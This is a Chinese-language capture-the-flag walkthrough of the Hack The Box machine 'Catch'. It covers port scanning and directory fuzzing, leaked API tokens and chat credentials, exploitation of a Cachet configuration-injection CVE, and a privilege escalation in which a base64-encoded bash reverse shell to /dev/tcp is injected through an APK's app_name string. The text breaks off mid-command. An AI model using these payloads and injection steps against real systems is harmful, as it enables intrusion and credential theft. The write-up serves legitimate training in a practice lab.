Hackthebox - Catch

靶场信息

靶场类型

信息搜集

NMAP

┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.150
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-06 03:34 EDT
Nmap scan report for 10.10.11.150
Host is up (0.25s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Catch Global Systems
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: i_like_gitea=229c01ff2c679664; Path=/; HttpOnly
|     Set-Cookie: _csrf=VFIu8a5yLSGnb8AWF33ofFOqRKE6MTY0OTIzMDUyNDYwMDczNjU5MQ; Path=/; Expires=Thu, 07 Apr 2022 07:35:24 GMT; HttpOnly; SameSite=Lax
|     Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Wed, 06 Apr 2022 07:35:24 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Catch Repositories </title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvcmllcyIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Set-Cookie: i_like_gitea=ada0631c19902f31; Path=/; HttpOnly
|     Set-Cookie: _csrf=Fjvxg_M7Bc_5OS6o7uXWAaUEJCg6MTY0OTIzMDUzMzM1MTAzMTUxNg; Path=/; Expires=Thu, 07 Apr 2022 07:35:33 GMT; HttpOnly; SameSite=Lax
|     Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Wed, 06 Apr 2022 07:35:33 GMT
|_    Content-Length: 0
5000/tcp open  upnp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, RTSPRequest, SMBProgNeg, ZendJavaBridge: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   GetRequest: 
|     HTTP/1.1 302 Found
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Content-Security-Policy: 
|     X-Content-Security-Policy: 
|     X-WebKit-CSP: 
|     X-UA-Compatible: IE=Edge,chrome=1
|     Location: /login
|     Vary: Accept, Accept-Encoding
|     Content-Type: text/plain; charset=utf-8
|     Content-Length: 28
|     Set-Cookie: connect.sid=s%3AEQngskGgO4I2xPH7SOxj7INNlQZTOA-7.bWQDiu%2BFXvDOHdHW15rgWh4N9jvQ7KAvrpzZQrh4Vvw; Path=/; HttpOnly
|     Date: Wed, 06 Apr 2022 07:35:28 GMT
|     Connection: close
|     Found. Redirecting to /login
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Content-Security-Policy: 
|     X-Content-Security-Policy: 
|     X-WebKit-CSP: 
|     X-UA-Compatible: IE=Edge,chrome=1
|     Allow: GET,HEAD
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 8
|     ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
|     Set-Cookie: connect.sid=s%3A-1OGMg8iZf45c1yBQ3QmeijWzg-5hyZy.5H0gXM7aorV%2BeFuutbDUJQn149ThPRcg%2FiKj%2FeVanl0; Path=/; HttpOnly
|     Vary: Accept-Encoding
|     Date: Wed, 06 Apr 2022 07:35:31 GMT
|     Connection: close
|_    GET,HEAD
8000/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Catch Global Systems
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.91%I=7%D=4/6%Time=624D42BB%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(GetRequest,14F9,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\x
SF:20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20i_like_gitea=229c01ff2c
SF:679664;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=VFIu8a5yLSGnb8AW
SF:F33ofFOqRKE6MTY0OTIzMDUyNDYwMDczNjU5MQ;\x20Path=/;\x20Expires=Thu,\x200
SF:7\x20Apr\x202022\x2007:35:24\x20GMT;\x20HttpOnly;\x20SameSite=Lax\r\nSe
SF:t-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Age=0;\x20HttpOnly\r\nX-
SF:Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Wed,\x2006\x20Apr\x202022\x200
SF:7:35:24\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20cl
SF:ass=\"theme-\">\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8
SF:\">\n\t<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20i
SF:nitial-scale=1\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20content
SF:=\"ie=edge\">\n\t<title>\x20Catch\x20Repositories\x20</title>\n\t<link\
SF:x20rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIjoi
SF:Q2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvcmllcyI
SF:sInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29ucyI6W3
SF:sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz")%r(Help,67,"HTTP/1\.1\x2040
SF:0\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\
SF:nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,17F,
SF:"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nSet-Cookie:\x20i_like_
SF:gitea=ada0631c19902f31;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=
SF:Fjvxg_M7Bc_5OS6o7uXWAaUEJCg6MTY0OTIzMDUzMzM1MTAzMTUxNg;\x20Path=/;\x20E
SF:xpires=Thu,\x2007\x20Apr\x202022\x2007:35:33\x20GMT;\x20HttpOnly;\x20Sa
SF:meSite=Lax\r\nSet-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Age=0;\x
SF:20HttpOnly\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Wed,\x2006\x20
SF:Apr\x202022\x2007:35:33\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSP
SF:Request,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text
SF:/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20R
SF:equest");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5000-TCP:V=7.91%I=7%D=4/6%Time=624D42C0%P=x86_64-pc-linux-gnu%r(Get
SF:Request,23C,"HTTP/1\.1\x20302\x20Found\r\nX-Frame-Options:\x20SAMEORIGI
SF:N\r\nX-Download-Options:\x20noopen\r\nX-Content-Type-Options:\x20nosnif
SF:f\r\nX-XSS-Protection:\x201;\x20mode=block\r\nContent-Security-Policy:\
SF:x20\r\nX-Content-Security-Policy:\x20\r\nX-WebKit-CSP:\x20\r\nX-UA-Comp
SF:atible:\x20IE=Edge,chrome=1\r\nLocation:\x20/login\r\nVary:\x20Accept,\
SF:x20Accept-Encoding\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\n
SF:Content-Length:\x2028\r\nSet-Cookie:\x20connect\.sid=s%3AEQngskGgO4I2xP
SF:H7SOxj7INNlQZTOA-7\.bWQDiu%2BFXvDOHdHW15rgWh4N9jvQ7KAvrpzZQrh4Vvw;\x20P
SF:ath=/;\x20HttpOnly\r\nDate:\x20Wed,\x2006\x20Apr\x202022\x2007:35:28\x2
SF:0GMT\r\nConnection:\x20close\r\n\r\nFound\.\x20Redirecting\x20to\x20/lo
SF:gin")%r(RTSPRequest,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnectio
SF:n:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F,"HTTP/1\.1\x20400\x20Ba
SF:d\x20Request\r\nConnection:\x20close\r\n\r\n")%r(SMBProgNeg,2F,"HTTP/1\
SF:.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(ZendJav
SF:aBridge,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\
SF:r\n\r\n")%r(HTTPOptions,247,"HTTP/1\.1\x20200\x20OK\r\nX-Frame-Options:
SF:\x20SAMEORIGIN\r\nX-Download-Options:\x20noopen\r\nX-Content-Type-Optio
SF:ns:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nContent-Secu
SF:rity-Policy:\x20\r\nX-Content-Security-Policy:\x20\r\nX-WebKit-CSP:\x20
SF:\r\nX-UA-Compatible:\x20IE=Edge,chrome=1\r\nAllow:\x20GET,HEAD\r\nConte
SF:nt-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x208\r\nETag
SF::\x20W/\"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg\"\r\nSet-Cookie:\x20connect\.sid
SF:=s%3A-1OGMg8iZf45c1yBQ3QmeijWzg-5hyZy\.5H0gXM7aorV%2BeFuutbDUJQn149ThPR
SF:cg%2FiKj%2FeVanl0;\x20Path=/;\x20HttpOnly\r\nVary:\x20Accept-Encoding\r
SF:\nDate:\x20Wed,\x2006\x20Apr\x202022\x2007:35:31\x20GMT\r\nConnection:\
SF:x20close\r\n\r\nGET,HEAD")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20Bad\x20Re
SF:quest\r\nConnection:\x20close\r\n\r\n")%r(DNSStatusRequestTCP,2F,"HTTP/
SF:1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(Help,
SF:2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n"
SF:);
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/6%OT=22%CT=1%CU=30269%PV=Y%DS=2%DC=T%G=Y%TM=624D4342
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)SEQ(SP=10
OS:5%GCD=3%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M505ST11NW7%O2=M505ST11NW7%O3
OS:=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11NW7%O6=M505ST11)WIN(W1=FE88%W2=F
OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT       ADDRESS
1   276.00 ms 10.10.14.1
2   276.19 ms 10.10.11.150

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 160.41 seconds

HTTP

80 端口

访问后发现任何页面,除了下载 apk 以外,都无法点。

接着我做了一下 fuzz,也并没有东西,先把 apk 文件下载下来吧,同时去看看其他内容

┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://10.10.11.150/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.150/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

javascript              [Status: 301, Size: 317, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]
                        [Status: 200, Size: 6163, Words: 855, Lines: 375]
:: Progress: [20116/20116] :: Job [1/1] :: 112 req/sec :: Duration: [0:02:39] :: Errors: 0 ::

没有内容

5000 端口

5000 端口是一个登陆页面,但是似乎没有账号

┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://10.10.11.150:5000/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.150:5000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

logout                  [Status: 302, Size: 28, Words: 4, Lines: 1]
media                   [Status: 301, Size: 177, Words: 7, Lines: 11]
login                   [Status: 200, Size: 2622, Words: 709, Lines: 57]
files                   [Status: 401, Size: 12, Words: 1, Lines: 1]
users                   [Status: 401, Size: 12, Words: 1, Lines: 1]
account                 [Status: 401, Size: 12, Words: 1, Lines: 1]
Login                   [Status: 200, Size: 2622, Words: 709, Lines: 57]
Connections             [Status: 401, Size: 12, Words: 1, Lines: 1]
connections             [Status: 401, Size: 12, Words: 1, Lines: 1]
Files                   [Status: 401, Size: 12, Words: 1, Lines: 1]
messages                [Status: 401, Size: 12, Words: 1, Lines: 1]
Account                 [Status: 401, Size: 12, Words: 1, Lines: 1]
Media                   [Status: 301, Size: 177, Words: 7, Lines: 11]
Users                   [Status: 401, Size: 12, Words: 1, Lines: 1]
FILES                   [Status: 401, Size: 12, Words: 1, Lines: 1]
Logout                  [Status: 302, Size: 28, Words: 4, Lines: 1]
Messages                [Status: 401, Size: 12, Words: 1, Lines: 1]
                        [Status: 302, Size: 28, Words: 4, Lines: 1]
rooms                   [Status: 401, Size: 12, Words: 1, Lines: 1]
MEDIA                   [Status: 301, Size: 177, Words: 7, Lines: 11]
CONNECTIONS             [Status: 401, Size: 12, Words: 1, Lines: 1]
LOGIN                   [Status: 200, Size: 2627, Words: 709, Lines: 57]
:: Progress: [20116/20116] :: Job [1/1] :: 77 req/sec :: Duration: [0:05:20] :: Errors: 0 ::

东西还挺多,去看一下

提示 Unauthorized 没有令牌嘛,毕竟没有登陆

8000 端口

似乎是一个系统运行监控的,然后点击下面的仪表盘会进入一个登录页面

试了几个弱口令都无法进去,去看看 apk 文件吧

┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://10.10.11.150:8000/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.150:8000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

admin                   [Status: 302, Size: 386, Words: 60, Lines: 12]
img                     [Status: 301, Size: 317, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 319, Words: 20, Lines: 10]
setup                   [Status: 302, Size: 382, Words: 60, Lines: 12]
dashboard               [Status: 302, Size: 386, Words: 60, Lines: 12]
storage                 [Status: 403, Size: 279, Words: 20, Lines: 10]
dist                    [Status: 301, Size: 318, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10]
                        [Status: 200, Size: 8870, Words: 1951, Lines: 302]
:: Progress: [20116/20116] :: Job [1/1] :: 70 req/sec :: Duration: [0:05:55] :: Errors: 0 ::

也没啥可看的东西

Apk

使用 apktool 进行反编译

┌──(root💀kali)-[~/Desktop/catch]
└─# apktool d catchv1.0.apk 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
I: Using Apktool 2.5.0-dirty on catchv1.0.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

然后查找一下 token

┌──(root💀kali)-[~/Desktop/catch]
└─# grep -rn token catchv1.0/res/values/strings.xml
43:    <string name="gitea_token">b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0</string>
47:    <string name="lets_chat_token">NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==</string>
104:    <string name="slack_token">xoxp-23984754863-2348975623103</string>

/catchv1.0/res/values/string.xml 下的第 47 行有一个 lets_chat_token ,应该就是这个了,来利用一下吧

漏洞利用

使用令牌授权进行读取

┌──(root💀kali)-[~/Desktop]
└─# curl -H 'Authorization: bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==' 'http://10.10.11.150:5000/rooms'
[{"id":"61b86b28d984e2451036eb17","slug":"status","name":"Status","description":"Cachet Updates and Maintenance","lastActive":"2021-12-14T10:34:20.749Z","created":"2021-12-14T10:00:08.384Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]},{"id":"61b8708efe190b466d476bfb","slug":"android_dev","name":"Android Development","description":"Android App Updates, Issues & More","lastActive":"2021-12-14T10:24:21.145Z","created":"2021-12-14T10:23:10.474Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]},{"id":"61b86b3fd984e2451036eb18","slug":"employees","name":"Employees","description":"New Joinees, Org updates","lastActive":"2021-12-14T10:18:04.710Z","created":"2021-12-14T10:00:31.043Z","owner":"61b86aead984e2451036eb16","private":false,"hasPassword":false,"participants":[]}]

读取一下 rooms 的内容

┌──(root💀kali)-[~/Desktop]
└─# curl -H 'Authorization: bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==' 'http://10.10.11.150:5000/rooms/61b86b28d984e2451036eb17/messages'
[{"id":"61b8732cfe190b466d476c02","text":"ah sure!","posted":"2021-12-14T10:34:20.749Z","owner":"61b86dbdfe190b466d476bf0","room":"61b86b28d984e2451036eb17"},{"id":"61b8731ffe190b466d476c01","text":"You should actually include this task to your list as well as a part of quarterly audit","posted":"2021-12-14T10:34:07.449Z","owner":"61b86aead984e2451036eb16","room":"61b86b28d984e2451036eb17"},{"id":"61b872b9fe190b466d476c00","text":"Also make sure we've our systems, applications and databases up-to-date.","posted":"2021-12-14T10:32:25.514Z","owner":"61b86dbdfe190b466d476bf0","room":"61b86b28d984e2451036eb17"},{"id":"61b87282fe190b466d476bff","text":"Excellent! ","posted":"2021-12-14T10:31:30.403Z","owner":"61b86aead984e2451036eb16","room":"61b86b28d984e2451036eb17"},{"id":"61b87277fe190b466d476bfe","text":"Why not. We've this in our todo list for next quarter","posted":"2021-12-14T10:31:19.094Z","owner":"61b86dbdfe190b466d476bf0","room":"61b86b28d984e2451036eb17"},{"id":"61b87241fe190b466d476bfd","text":"@john is it possible to add SSL to our status domain to make sure everything is secure ? ","posted":"2021-12-14T10:30:25.108Z","owner":"61b86aead984e2451036eb16","room":"61b86b28d984e2451036eb17"},{"id":"61b8702dfe190b466d476bfa","text":"Here are the credentials `john :  E}V!mywu_69T4C}W`","posted":"2021-12-14T10:21:33.859Z","owner":"61b86f15fe190b466d476bf5","room":"61b86b28d984e2451036eb17"},{"id":"61b87010fe190b466d476bf9","text":"Sure one sec.","posted":"2021-12-14T10:21:04.635Z","owner":"61b86f15fe190b466d476bf5","room":"61b86b28d984e2451036eb17"},{"id":"61b86fb1fe190b466d476bf8","text":"Can you create an account for me ? ","posted":"2021-12-14T10:19:29.677Z","owner":"61b86dbdfe190b466d476bf0","room":"61b86b28d984e2451036eb17"},{"id":"61b86f4dfe190b466d476bf6","text":"Hey Team! I'll be handling the `status.catch.htb` from now on. Lemme know if you need anything from me. ","posted":"2021-12-14T10:17:49.761Z","owner":"61b86f15fe190b466d476bf5","room":"61b86b28d984e2451036eb17"}]

继续读取一下房间内的消息

username = john
password = E}V!mywu_69T4C}W

这里从上面的内容中提取到了一组账号密码

拿到 8000 端口去登陆试试

成功登陆,到处看看

我们可以看到,这是一个 cachet 的服务器,去搜索一下漏洞

找到了一篇 Cachet 2.4:通过 Laravel 配置注入执行代码 CVE-2021-39165

https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection

根据文章描述,拦截 EMAIL 的包,将内容修改为注入语句就行了

修改为 ${DB_USERNAME}

修改为 ${DB_PASSWORD}

username = will
passowrd = s2#4Fg0_%3!

得到了一组账号密码,去登陆 ssh

┌──(root💀kali)-[~/Desktop]
└─# ssh will@10.10.11.150
will@10.10.11.150's password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-104-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 06 Apr 2022 08:41:02 AM UTC

  System load:                      0.19
  Usage of /:                       75.6% of 16.61GB
  Memory usage:                     83%
  Swap usage:                       33%
  Processes:                        448
  Users logged in:                  0
  IPv4 address for br-535b7cf3a728: 172.18.0.1
  IPv4 address for br-fe1b5695b604: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.150
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:ffd

0 updates can be applied immediately.

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Apr  6 08:40:51 2022 from 10.10.14.9
will@catch:~$ whoami&&id
will
uid=1000(will) gid=1000(will) groups=1000(will)

登陆成功

will@catch:~$ ls
user.txt
will@catch:~$ cat user.txt 
24b48fcc5b166f68a855af04633081c7

成功拿到 user 权限的 flag 文件

权限提升

will@catch:~$ sudo -l
[sudo] password for will: 
Sorry, user will may not run sudo on catch.

查看 sudo -l 失败,那看来不是这个提权思路了

去跑了一下 linpeas.sh

[+] Readable files belonging to root and readable by me but not world readable
-rwxr-x--x+ 1 root root 1894 Mar  3 14:23 /opt/mdm/verify.sh
-rw-r----- 1 root will 33 Apr  5 17:23 /home/will/user.txt

这里看到有一个 /opt/mdm/verify.sh 文件,去进程搜一下

will@catch:~$ ps auxw|grep verify.sh
will      386873  0.0  0.0   6436   656 pts/0    S+   08:59   0:00 grep --color=auto verify.sh

也有运行记录,去查看一下文件

will@catch:~$ cat /opt/mdm/verify.sh
#!/bin/bash

###################
# Signature Check #
###################

sig_check() {
        jarsigner -verify "$1/$2" 2>/dev/null >/dev/null
        if [[ $? -eq 0 ]]; then
                echo '[+] Signature Check Passed'
        else
                echo '[!] Signature Check Failed. Invalid Certificate.'
                cleanup
                exit
        fi
}

#######################
# Compatibility Check #
#######################

comp_check() {
        apktool d -s "$1/$2" -o $3 2>/dev/null >/dev/null
        COMPILE_SDK_VER=$(grep -oPm1 "(?<=compileSdkVersion=\")[^\"]+" "$PROCESS_BIN/AndroidManifest.xml")
        if [ -z "$COMPILE_SDK_VER" ]; then
                echo '[!] Failed to find target SDK version.'
                cleanup
                exit
        else
                if [ $COMPILE_SDK_VER -lt 18 ]; then
                        echo "[!] APK Doesn't meet the requirements"
                        cleanup
                        exit
                fi
        fi
}

####################
# Basic App Checks #
####################

app_check() {
        APP_NAME=$(grep -oPm1 "(?<=<string name=\"app_name\">)[^<]+" "$1/res/values/strings.xml")
        echo $APP_NAME
        if [[ $APP_NAME == *"Catch"* ]]; then
                echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
                mv "$3/$APK_NAME" "$2/$APP_NAME/$4"
        else
                echo "[!] App doesn't belong to Catch Global"
                cleanup
                exit
        fi
}

###########
# Cleanup #
###########

cleanup() {
        rm -rf $PROCESS_BIN;rm -rf "$DROPBOX/*" "$IN_FOLDER/*";rm -rf $(ls -A /opt/mdm | grep -v apk_bin | grep -v verify.sh)
}

###################
# MDM CheckerV1.0 #
###################

DROPBOX=/opt/mdm/apk_bin
IN_FOLDER=/root/mdm/apk_bin
OUT_FOLDER=/root/mdm/certified_apps
PROCESS_BIN=/root/mdm/process_bin

for IN_APK_NAME in $DROPBOX/*.apk;do
        OUT_APK_NAME="$(echo ${IN_APK_NAME##*/} | cut -d '.' -f1)_verified.apk"
        APK_NAME="$(openssl rand -hex 12).apk"
        if [[ -L "$IN_APK_NAME" ]]; then
                exit
        else
                mv "$IN_APK_NAME" "$IN_FOLDER/$APK_NAME"
        fi
        sig_check $IN_FOLDER $APK_NAME
        comp_check $IN_FOLDER $APK_NAME $PROCESS_BIN
        app_check $PROCESS_BIN $OUT_FOLDER $IN_FOLDER $OUT_APK_NAME
done
cleanup

这里的 app_check() 函数有问题

它在 /res/values/strings.xml 的 APK 中搜索 APP_NAME

我们可以利用一下 做一个命令注入

┌──(root💀kali)-[~/Desktop]
└─# echo '/bin/bash -i >& /dev/tcp/10.10.14.9/4444 0>&1'|base64
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjkvNDQ0NCAwPiYxCg==

┌──(root💀kali)-[~/Desktop]
└─# echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjkvNDQ0NCAwPiYxCg==|base64 -d
/bin/bash -i >& /dev/tcp/10.10.14.9/4444 0>&1

然后编写一下 payload

<string name="app_name">Catch|echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjkvNDQ0NCAwPiYxCg== | base64 -d | bash</string>

然后使用上面的 payload 替换 /res/values/strings.xml 的第 30 行 app_name 这一行

接着使用 nc -nvlp 监听一个端口

nc -nvlp 4444

然后去使用 github 上最新版本 2.6.1 的 apktool 来打包构造新的 app

┌──(root💀kali)-[~/Desktop/catch]
